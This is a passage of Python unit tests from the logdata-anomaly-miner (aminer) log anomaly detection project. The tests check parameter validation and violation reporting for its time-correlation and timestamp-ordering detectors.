self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=-1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=2) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=0) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=-1) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=2, max_rule_attributes=1) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=["default"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=None) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=123.3) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, max_rule_attributes=2) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, min_rule_attributes=1, max_rule_attributes=1) self.assertRaises(ValueError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list="") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=b"Default") self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=True) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=123) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=123.22) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=()) self.assertRaises(TypeError, TimeCorrelationDetector, self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=set()) TimeCorrelationDetector(self.aminer_config, [self.stream_printer_event_handler], 2, log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimeCorrelationViolationDetectorTest.py000066400000000000000000000530021500476301700334740ustar00rootroot00000000000000import unittest import time from aminer.analysis.TimeCorrelationViolationDetector import CorrelationRule, EventClassSelector, TimeCorrelationViolationDetector from aminer.analysis import Rules from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase, DummyMatchContext, DummySequenceModelElement, DummyFixedDataModelElement, DummyNumberModelElement from datetime import datetime class TimeCorrelationViolationDetectorTest(TestBase): """Unittests for the TimeCorrelationViolationDetector.""" def test1receive_atom(self): """Test if log atoms are processed correctly and violations are detected.""" expected_string = '%s Correlation rule "%s" violated\nTimeCorrelationViolationDetector: "None" (%d lines)\n ' expected_string_too_early = expected_string + 'FAIL: B-Event for "%s" (%s) was found too early!\n\n\n' expected_string_too_late = expected_string + 'FAIL: B-Event for "%s" (%s) was not found in time!\n\n\n' expected_string_different_attributes = expected_string + 'FAIL: "%s" (%s) %d is not equal %d\n\n\n' model = "/model" dtf = "%Y-%m-%d %H:%M:%S" service_children1 = [ DummyFixedDataModelElement("Value1Key", b"Value1: "), DummyFixedDataModelElement("Value1Value", b"fixed Value1"), DummyFixedDataModelElement("Value2Key", b", Value2: "), DummyNumberModelElement("Value2Value"), DummyFixedDataModelElement("Value3Key", b", Value3: "), DummyFixedDataModelElement("Value3Value", b"fixed Value3"), DummyFixedDataModelElement("Value4Key", b", Value4: "), DummyFixedDataModelElement("Value4Value", b"fixed Value4")] service_children2 = [ DummyFixedDataModelElement("Value1Key", b"Value1: "), DummyFixedDataModelElement("Value1Value", b"fixed Value1"), DummyFixedDataModelElement("Value2Key", b", Value2: "), DummyFixedDataModelElement("Value2Value", b"fixed Value2"), DummyFixedDataModelElement("Value3Key", b", Value3: "), DummyNumberModelElement("Value3Value"), DummyFixedDataModelElement("Value4Key", b", Value4: "), DummyFixedDataModelElement("Value4Value", b"fixed Value4")] service_children3 = [ DummyFixedDataModelElement("Value1Key", b"Value1: "), DummyFixedDataModelElement("Value1Value", b"other Value1"), DummyFixedDataModelElement("Value2Key", b", Value2: "), DummyFixedDataModelElement("Value2Value", b"fixed Value2"), DummyFixedDataModelElement("Value3Key", b", Value3: "), DummyNumberModelElement("Value3Value"), DummyFixedDataModelElement("Value4Key", b", Value4: "), DummyFixedDataModelElement("Value4Value", b"fixed Value4")] match_context1 = DummyMatchContext(b"Value1: fixed Value1, Value2: 22500, Value3: fixed Value3, Value4: fixed Value4") match_context2 = DummyMatchContext(b"Value1: fixed Value1, Value2: fixed Value2, Value3: 22500, Value4: fixed Value4") match_context3 = DummyMatchContext(b"Value1: fixed Value1, Value2: fixed Value2, Value3: 22501, Value4: fixed Value4") match_context4 = DummyMatchContext(b"Value1: other Value1, Value2: fixed Value2, Value3: 22500, Value4: fixed Value4") seq1 = DummySequenceModelElement("sequence1", service_children1) seq2 = DummySequenceModelElement("sequence2", service_children2) seq3 = DummySequenceModelElement("sequence2", service_children3) match_element1 = seq1.get_match_element(model, match_context1) match_element2 = seq2.get_match_element(model, match_context2) match_element3 = seq2.get_match_element(model, match_context3) match_element4 = seq3.get_match_element(model, match_context4) t = time.time() def setup(): cr = CorrelationRule("Correlation", 2, 10) ecsa = EventClassSelector("Selector1", [cr], None) ecsb = EventClassSelector("Selector2", None, [cr]) rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)] return cr, ecsa, ecsb, rules # in time cr, ecsa, ecsb, rules = setup() tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) iterations = 30 for i in range(iterations): log_atom = LogAtom(match_element1.match_string, ParserMatch(match_element1), t, self) tcvd.receive_atom(log_atom) for i in range(iterations): log_atom = LogAtom(match_element2.match_string, ParserMatch(match_element2), t + 2 + i * 0.1, self) tcvd.receive_atom(log_atom) self.assertEqual(self.output_stream.getvalue(), "") # too early cr, ecsa, ecsb, rules = setup() tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) log_atom1 = LogAtom(match_element1.match_string, ParserMatch(match_element1), t, self) tcvd.receive_atom(log_atom1) log_atom2 = LogAtom(match_element2.match_string, ParserMatch(match_element2), t + 1, self) tcvd.receive_atom(log_atom2) tcvd.do_timer(t) self.assertEqual(self.output_stream.getvalue(), expected_string_too_early % (datetime.fromtimestamp(t).strftime(dtf), cr.rule_id, 1, match_element1.match_string.decode(), ecsa.action_id)) self.reset_output_stream() # too late cr, ecsa, ecsb, rules = setup() tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) log_atom1 = LogAtom(match_element1.match_string, ParserMatch(match_element1), t, self) tcvd.receive_atom(log_atom1) log_atom2 = LogAtom(match_element2.match_string, ParserMatch(match_element2), t + 10.1, self) tcvd.receive_atom(log_atom2) tcvd.do_timer(t) self.assertEqual(self.output_stream.getvalue(), expected_string_too_late % (datetime.fromtimestamp(t).strftime(dtf), cr.rule_id, 1, match_element1.match_string.decode(), ecsa.action_id)) self.reset_output_stream() # test max_violations cr, ecsa, ecsb, rules = setup() tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) iterations = 30 for i in range(iterations): log_atom = LogAtom(match_element1.match_string, ParserMatch(match_element1), t, self) tcvd.receive_atom(log_atom) for i in range(iterations): log_atom = LogAtom(match_element2.match_string, ParserMatch(match_element2), t + 11 + i * 0.1, self) tcvd.receive_atom(log_atom) tcvd.do_timer(t) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t).strftime(dtf), cr.rule_id, 1) + 'FAIL: B-Event for "%s" (%s) was not found in time!\n' % (match_element1.match_string.decode(), ecsa.action_id) * 20 + "... (10 more)\n\n\n") self.reset_output_stream() # change value 3 - error expected cr = CorrelationRule("Correlation", 2, 10, artefact_match_parameters=[("/model/sequence1/Value2Value", "/model/sequence2/Value3Value")]) ecsa = EventClassSelector("Selector1", [cr], None) ecsb = EventClassSelector("Selector2", None, [cr]) rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)] tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) log_atom1 = LogAtom(match_element1.match_string, ParserMatch(match_element1), t, self) tcvd.receive_atom(log_atom1) log_atom2 = LogAtom(match_element3.match_string, ParserMatch(match_element3), t + 2, self) tcvd.receive_atom(log_atom2) tcvd.do_timer(t) self.assertEqual(self.output_stream.getvalue(), expected_string_different_attributes % ( datetime.fromtimestamp(t).strftime(dtf), cr.rule_id, 1, match_element1.match_string.decode(), ecsa.action_id, 22500, 22501)) self.reset_output_stream() # - change value 1 - no error expected as path is not checked. cr = CorrelationRule("Correlation", 2, 10, artefact_match_parameters=[("/model/sequence1/Value2Value", "/model/sequence2/Value3Value")]) ecsa = EventClassSelector("Selector1", [cr], None) ecsb = EventClassSelector("Selector2", None, [cr]) rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)] tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) log_atom1 = LogAtom(match_element1.match_string, ParserMatch(match_element1), t, self) tcvd.receive_atom(log_atom1) log_atom2 = LogAtom(match_element4.match_string, ParserMatch(match_element4), t + 2, self) tcvd.receive_atom(log_atom2) tcvd.do_timer(t) self.assertEqual(self.output_stream.getvalue(), "") def test2do_timer(self): """Test if the do_timer method is implemented properly.""" cr = CorrelationRule("Correlation", 2, 10) ecsa = EventClassSelector("Selector1", [cr], None) ecsb = EventClassSelector("Selector2", None, [cr]) rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)] tcvd = TimeCorrelationViolationDetector(self.analysis_context.aminer_config, rules, [self.stream_printer_event_handler]) t = time.time() self.assertEqual(tcvd.do_timer(t + 200), 10) self.assertEqual(tcvd.do_timer(t + 400), 10) self.assertEqual(tcvd.do_timer(t + 999), 10) self.assertEqual(tcvd.do_timer(t + 1000), 10) def test3validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" cr = CorrelationRule("Correlation", 2, 10) ecsa = EventClassSelector("Selector1", [cr], None) ecsb = EventClassSelector("Selector2", None, [cr]) rules = [Rules.PathExistsMatchRule("/model/sequence1/Value2Key", ecsa), Rules.PathExistsMatchRule("/model/sequence2/Value3Key", ecsb)] self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, ["default"], [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, ["default"]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, None) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, "") self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, b"Default") self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, True) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, 123) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, 123.3) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, {"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, ()) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, set()) self.assertRaises(ValueError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, TimeCorrelationViolationDetector, self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=set()) TimeCorrelationViolationDetector(self.aminer_config, rules, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) self.assertRaises(ValueError, EventClassSelector, "", [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, ["default"], [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, None, [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, b"Default", [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, True, [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, 123, [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, 123.3, [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, {"id": "Default"}, [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, (), [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, set(), [cr], [cr]) self.assertRaises(TypeError, EventClassSelector, "default", "", [cr]) self.assertRaises(TypeError, EventClassSelector, "default", ["default"], [cr]) self.assertRaises(TypeError, EventClassSelector, "default", [None], [cr]) self.assertRaises(TypeError, EventClassSelector, "default", b"Default", [cr]) self.assertRaises(TypeError, EventClassSelector, "default", True, [cr]) self.assertRaises(TypeError, EventClassSelector, "default", 123, [cr]) self.assertRaises(TypeError, EventClassSelector, "default", 123.3, [cr]) self.assertRaises(TypeError, EventClassSelector, "default", {"id": "Default"}, [cr]) self.assertRaises(TypeError, EventClassSelector, "default", (), [cr]) self.assertRaises(TypeError, EventClassSelector, "default", set(), [cr]) self.assertRaises(TypeError, EventClassSelector, "default", [cr], "") self.assertRaises(TypeError, EventClassSelector, "default", [cr], ["default"]) self.assertRaises(TypeError, EventClassSelector, "default", [cr], [None]) self.assertRaises(TypeError, EventClassSelector, "default", [cr], b"Default") self.assertRaises(TypeError, EventClassSelector, "default", [cr], True) self.assertRaises(TypeError, EventClassSelector, "default", [cr], 123) self.assertRaises(TypeError, EventClassSelector, "default", [cr], 123.3) self.assertRaises(TypeError, EventClassSelector, "default", [cr], {"id": "Default"}) self.assertRaises(TypeError, EventClassSelector, "default", [cr], ()) self.assertRaises(TypeError, EventClassSelector, "default", [cr], set()) self.assertRaises(ValueError, EventClassSelector, "default", None, None) self.assertRaises(ValueError, EventClassSelector, "default", [], []) EventClassSelector("default", [cr, cr], [cr]) EventClassSelector("default", None, [cr]) EventClassSelector("default", [cr], None) EventClassSelector("default", [], [cr]) EventClassSelector("default", [cr], []) self.assertRaises(ValueError, CorrelationRule, "", 1, 10) self.assertRaises(TypeError, CorrelationRule, ["default"], 1, 10) self.assertRaises(TypeError, CorrelationRule, None, 1, 10) self.assertRaises(TypeError, CorrelationRule, b"Default", 1, 10) self.assertRaises(TypeError, CorrelationRule, True, 1, 10) self.assertRaises(TypeError, CorrelationRule, 123, 1, 10) self.assertRaises(TypeError, CorrelationRule, 123.3, 1, 10) self.assertRaises(TypeError, CorrelationRule, {"id": "Default"}, 1, 10) self.assertRaises(TypeError, CorrelationRule, (), 1, 10) self.assertRaises(TypeError, CorrelationRule, set(), 1, 10) self.assertRaises(TypeError, CorrelationRule, "default", "", 10) self.assertRaises(TypeError, CorrelationRule, "default", ["default"], 10) self.assertRaises(TypeError, CorrelationRule, "default", None, 10) self.assertRaises(TypeError, CorrelationRule, "default", b"Default", 10) self.assertRaises(TypeError, CorrelationRule, "default", True, 10) self.assertRaises(TypeError, CorrelationRule, "default", "123", 10) self.assertRaises(TypeError, CorrelationRule, "default", {"id": "Default"}, 10) self.assertRaises(TypeError, CorrelationRule, "default", (), 10) self.assertRaises(TypeError, CorrelationRule, "default", set(), 10) self.assertRaises(TypeError, CorrelationRule, "default", 1, "") self.assertRaises(TypeError, CorrelationRule, "default", 1, ["default"]) self.assertRaises(TypeError, CorrelationRule, "default", 1, None) self.assertRaises(TypeError, CorrelationRule, "default", 1, b"Default") self.assertRaises(TypeError, CorrelationRule, "default", 1, True) self.assertRaises(TypeError, CorrelationRule, "default", 1, "123") self.assertRaises(TypeError, CorrelationRule, "default", 1, {"id": "Default"}) self.assertRaises(TypeError, CorrelationRule, "default", 1, ()) self.assertRaises(TypeError, CorrelationRule, "default", 1, set()) self.assertRaises(ValueError, CorrelationRule, "default", -1, 10) self.assertRaises(ValueError, CorrelationRule, "default", 10, 1) self.assertRaises(ValueError, CorrelationRule, "default", 10, 10) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters="") self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=["default"]) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=b"Default") self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=True) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters="123") self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=123) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=123.3) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters={"id": "Default"}) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=()) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, artefact_match_parameters=set()) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations="") self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=["default"]) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=None) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=b"Default") self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=True) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations="123") self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=123.3) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations={"id": "Default"}) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=()) self.assertRaises(TypeError, CorrelationRule, "default", 1, 10, max_violations=set()) CorrelationRule("default", 0, 10, artefact_match_parameters=[("/model/sequence1/Value2Key", "/model/sequence2/Value3Key")]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimestampCorrectionFiltersTest.py000066400000000000000000000102521500476301700323410ustar00rootroot00000000000000import unittest from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch from aminer.analysis.TimestampCorrectionFilters import SimpleMonotonicTimestampAdjust from time import time from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from datetime import datetime class TimestampCorrectionFiltersTest(TestBase): """Unittests for the TimestampCorrectionFilters.""" def test1receive_atom(self): """This test case checks if the timestamp is adjusted and log atoms are forwarded correctly.""" match_context = DummyMatchContext(b" pid=") fdme = DummyFixedDataModelElement("s1", b" pid=") match_element = fdme.get_match_element("match", match_context) nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False, output_logline=False) smta = SimpleMonotonicTimestampAdjust([nmpd], False) # the atom time should not be set automatically if None. log_atom = LogAtom(fdme.data, ParserMatch(match_element), None, nmpd) self.assertEqual(smta.receive_atom(log_atom), True) self.assertEqual(smta.latest_timestamp_seen, 0) self.assertEqual(log_atom.atom_time, None) t = 100 log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd) self.assertEqual(smta.receive_atom(log_atom), True) self.assertEqual(smta.latest_timestamp_seen, t) self.assertEqual(log_atom.atom_time, t) t = log_atom.atom_time + 100 log_atom = LogAtom(fdme.data, ParserMatch(match_element), t, nmpd) self.assertEqual(smta.receive_atom(log_atom), True) self.assertEqual(smta.latest_timestamp_seen, t) self.assertEqual(log_atom.atom_time, t) log_atom = LogAtom(fdme.data, ParserMatch(match_element), t-1000, nmpd) self.assertEqual(smta.receive_atom(log_atom), True) self.assertEqual(smta.latest_timestamp_seen, t) self.assertEqual(log_atom.atom_time, t) def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" nmpd = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [""], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [b""], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [True], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [None], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [123], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [123.2], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [{"id": "Default"}], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [["Default"]], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [set()], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [()], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [(nmpd, False)], True) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], "") self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], None) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], b"Default") self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], 123) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], 123.2) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], {"id": "Default"}) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], ["Default"]) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], []) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], ()) self.assertRaises(TypeError, SimpleMonotonicTimestampAdjust, [nmpd], set()) SimpleMonotonicTimestampAdjust([nmpd], False) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/TimestampsUnsortedDetectorTest.py000066400000000000000000000162601500476301700323660ustar00rootroot00000000000000import unittest from aminer.input.LogAtom import LogAtom from aminer.parsing.ParserMatch import ParserMatch import time from aminer.analysis.TimestampsUnsortedDetector import TimestampsUnsortedDetector from aminer.analysis.NewMatchPathDetector import NewMatchPathDetector from unit.TestBase import TestBase, DummyFixedDataModelElement, DummyMatchContext from datetime import datetime class TimestampsUnsortedDetectorTest(TestBase): """Unittests for the TimestampsUnsortedDetector.""" def test1receive_atom(self): """Test if log atoms are processed correctly and the detector is learning the correct timestamps.""" expected_string = '%s Timestamp %s below %s\n%s: "None" (%d lines)\n %s\n\n' pid = b" pid=" datetime_format_string = "%Y-%m-%d %H:%M:%S" # test if nothing happens, when the timestamp is, as expected, higher than the last one. match_context_fixed_dme = DummyMatchContext(pid) fixed_dme = DummyFixedDataModelElement("s1", pid) match_element_fixed_dme = fixed_dme.get_match_element("match", match_context_fixed_dme) new_match_path_detector = NewMatchPathDetector(self.aminer_config, [self.stream_printer_event_handler], "Default", False) t = time.time() log_atom = LogAtom(fixed_dme.data, ParserMatch(match_element_fixed_dme), t, new_match_path_detector) timestamp_unsorted_detector = TimestampsUnsortedDetector(self.aminer_config, [self.stream_printer_event_handler], False, False) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") log_atom.set_timestamp(t + 10000) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), "") # test if an event is created, when the timestamp is lower than the last one. log_atom.set_timestamp(t) self.assertTrue(timestamp_unsorted_detector.receive_atom(log_atom)) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t).strftime(datetime_format_string), datetime.fromtimestamp(t).strftime(datetime_format_string), datetime.fromtimestamp(t + 10000).strftime(datetime_format_string), timestamp_unsorted_detector.__class__.__name__, 1, " pid=")) self.reset_output_stream() # test if the aminer exits, when the timestamp is lower than the last one and the exit_on_error_flag is set. timestamp_unsorted_detector.exit_on_error_flag = True log_atom.set_timestamp(t - 10000) with self.assertRaises(SystemExit) as cm: timestamp_unsorted_detector.receive_atom(log_atom) self.assertEqual(cm.exception.code, 1) self.assertEqual(self.output_stream.getvalue(), expected_string % ( datetime.fromtimestamp(t - 10000).strftime(datetime_format_string), datetime.fromtimestamp(t - 10000).strftime(datetime_format_string), datetime.fromtimestamp(t).strftime(datetime_format_string), timestamp_unsorted_detector.__class__.__name__, 1, " pid=")) self.reset_output_stream() def test2validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, ["default"]) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, None) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, "") self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, b"Default") self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, True) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, 123) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, 123.3) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, {"id": "Default"}) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, ()) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, set()) self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, [self.stream_printer_event_handler], exit_on_error_flag=b"True") self.assertRaises(TypeError, TimestampsUnsortedDetector, self.aminer_config, 